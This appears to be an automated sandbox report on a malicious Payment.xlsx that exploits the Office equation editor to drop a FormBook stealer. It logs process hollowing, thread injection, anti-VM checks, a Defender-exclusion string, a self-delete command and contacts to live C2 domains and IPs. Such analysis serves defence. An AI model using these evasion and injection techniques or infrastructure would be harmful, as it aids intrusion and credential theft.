          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
          Source: Payment.xlsxVirustotal: Detection: 18%
          Source: Payment.xlsxReversingLabs: Detection: 10%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXEJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'Jump to behavior
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{8856F961-340A-11D0-A96B-00C04FD705A2}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
          Source: Payment.xlsxStatic file information: File size 1363456 > 1048576
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: wntdll.pdb source: vbc.exe, NAPSTAT.EXE
          Source: Binary string: napstat.pdb source: vbc.exe, 00000007.00000003.2227630571.00000000007DE000.00000004.00000001.sdmp
          Source: Payment.xlsxInitial sample: OLE indicators vbamacros = False
          Source: Payment.xlsxInitial sample: OLE indicators encrypted = True
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0039C4C8 pushfd ; retn 0030h4_2_0039C4C9
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0039C588 push eax; ret 4_2_0039C589
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E5748 push eax; retn 007Fh4_2_007E5751
          Source: C:\Users\Public\vbc.exeCode function: 4_2_007E6FC8 pushfd ; retf 4_2_007E6FC9
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00415AFB push eax; iretd 7_2_00415B02
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B3F2 push eax; ret 7_2_0041B3F8
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B3FB push eax; ret 7_2_0041B462
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B3A5 push eax; ret 7_2_0041B3F8
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B45C push eax; ret 7_2_0041B462
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00414E3F push edx; retf 7_2_00414E4D
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00415FF0 push es; iretd 7_2_00415FF1
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B3DFA1 push ecx; ret 7_2_00B3DFB4
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FFDFA1 push ecx; ret 9_2_01FFDFB4
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0009B3A5 push eax; ret 9_2_0009B3F8
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0009B3FB push eax; ret 9_2_0009B462
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0009B3F2 push eax; ret 9_2_0009B3F8
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_0009B45C push eax; ret 9_2_0009B462
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00095AFB push eax; iretd 9_2_00095B02
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00094E3F push edx; retf 9_2_00094E4D
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00095FF0 push es; iretd 9_2_00095FF1
          Source: initial sampleStatic PE information: section name: .text entropy: 7.63788106715
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\so[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: Payment.xlsxStream path 'EncryptedPackage' entropy: 7.99982132167 (max. 8.0)

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2872, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NAPSTAT.EXERDTSC instruction interceptor: First address: 00000000000885E4 second address: 00000000000885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NAPSTAT.EXERDTSC instruction interceptor: First address: 000000000008896E second address: 0000000000088974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 7_2_004088A0 rdtsc 7_2_004088A0
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2392Thread sleep time: -300000s >= -30000sJump to behavior
          Source: C:\Users\Public\vbc.exe TID: 2768Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\Public\vbc.exe TID: 3000Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Users\Public\vbc.exe TID: 2892Thread sleep time: -102957s >= -30000sJump to behavior
          Source: C:\Users\Public\vbc.exe TID: 3000Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Users\Public\vbc.exe TID: 2908Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 2028Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\NAPSTAT.EXELast function: Thread delayed
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 102957Jump to behavior
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000008.00000002.2370907370.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000008.00000000.2182958260.00000000041AD000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000008.00000000.2174877263.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\Public\vbc.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess queried: DebugPortJump to behavior
          Source: C:\Users\Public\vbc.exeCode function: 7_2_004088A0 rdtsc 7_2_004088A0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00409B10 LdrLoadDll,7_2_00409B10
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B426F8 mov eax, dword ptr fs:[00000030h]7_2_00B426F8
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020026F8 mov eax, dword ptr fs:[00000030h]9_2_020026F8
          Source: C:\Users\Public\vbc.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\Public\vbc.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess token adjusted: DebugJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 54.156.162.121 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 103.5.116.132 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.girlboyfriends.com
          Source: C:\Windows\explorer.exeNetwork Connect: 66.235.200.147 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.discjockeydelraybeach.com
          Source: C:\Windows\explorer.exeDomain query: www.burundiacademyst.com
          Source: C:\Windows\explorer.exeNetwork Connect: 157.7.107.165 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.210 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 108.177.174.182 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.donelys.com
          Source: C:\Windows\explorer.exeDomain query: www.arfjkacsgatfzbazpdth.com
          Source: C:\Windows\explorer.exeDomain query: www.pipienta.com
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1388Jump to behavior
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1388Jump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEThread register set: target process: 1388Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\NAPSTAT.EXE base address: 310000Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXEJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'Jump to behavior
          Source: explorer.exe, 00000008.00000000.2175263464.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000008.00000000.2175263464.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000008.00000002.2370907370.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000008.00000000.2175263464.00000000006F0000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformationJump to behavior
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading111OS Credential DumpingSecurity Software Discovery321Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsExtra Window Memory Injection1Disable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol123SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information41Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobExtra Window Memory Injection1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 404048 Sample: Payment.xlsx Startdate: 04/05/2021 Architecture: WINDOWS Score: 100 56 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->56 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 14 other signatures 2->62 9 EQNEDT32.EXE 12 2->9         started        14 EXCEL.EXE 38 24 2->14         started        process3 dnsIp4 40 will.kasraz.com 192.3.122.177, 49167, 80 AS-COLOCROSSINGUS United States 9->40 34 C:\Users\user\AppData\Local\...\so[1].exe, PE32 9->34 dropped 36 C:\Users\Public\vbc.exe, PE32 9->36 dropped 80 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 9->80 16 vbc.exe 9->16         started        38 C:\Users\user\Desktop\~$Payment.xlsx, data 14->38 dropped file5 signatures6 process7 signatures8 48 Multi AV Scanner detection for dropped file 16->48 50 Machine Learning detection for dropped file 16->50 52 Tries to detect virtualization through RDTSC time measurements 16->52 54 Injects a PE file into a foreign processes 16->54 19 vbc.exe 16->19         started        22 vbc.exe 16->22         started        24 vbc.exe 16->24         started        process9 signatures10 64 Modifies the context of a thread in another process (thread injection) 19->64 66 Maps a DLL or memory area into another process 19->66 68 Sample uses process hollowing technique 19->68 70 Queues an APC in another process (thread injection) 19->70 26 NAPSTAT.EXE 19->26         started        29 explorer.exe 19->29 injected process11 dnsIp12 72 Modifies the context of a thread in another process (thread injection) 26->72 74 Maps a DLL or memory area into another process 26->74 76 Tries to detect virtualization through RDTSC time measurements 26->76 32 cmd.exe 26->32         started        42 www.discjockeydelraybeach.com 108.177.174.182, 49170, 80 LEASEWEB-USA-LAX-11US United States 29->42 44 www.pipienta.com 157.7.107.165, 49174, 80 INTERQGMOInternetIncJP Japan 29->44 46 8 other IPs or domains 29->46 78 System process connects to network (likely due to code injection or exploit) 29->78 signatures13 process14

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Payment.xlsx19%VirustotalBrowse
          Payment.xlsx11%ReversingLabsDocument-Office.Exploit.CVE-2018-0802
